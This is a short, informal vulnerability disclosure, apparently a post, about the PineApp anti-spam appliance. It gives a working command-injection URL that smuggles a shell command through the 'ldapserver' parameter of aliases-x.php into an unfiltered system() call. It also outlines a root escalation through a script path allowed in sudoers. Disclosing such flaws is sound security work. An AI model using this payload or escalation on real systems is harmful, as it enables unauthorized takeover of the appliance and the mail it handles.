pineapp makes an anti-spam product, which can be downloaded for vmware, etc.

the security of the product is a fucking joke, containing everything from authentication bypass to root exploits. there is really no hope, the developers didnt even try. they can patch those specific vulnerabilities, but have no idea what theyre doing. i only scratched its surface.

unfiltered system() in 

http://192.168.9.2/aliases-x.php?getLdapDC=wtf&ldapserver=;id>/tmp/wtf;

escalate to root by creating for example /usr/local/bin/cfma-mirror.sh  (in sudoers)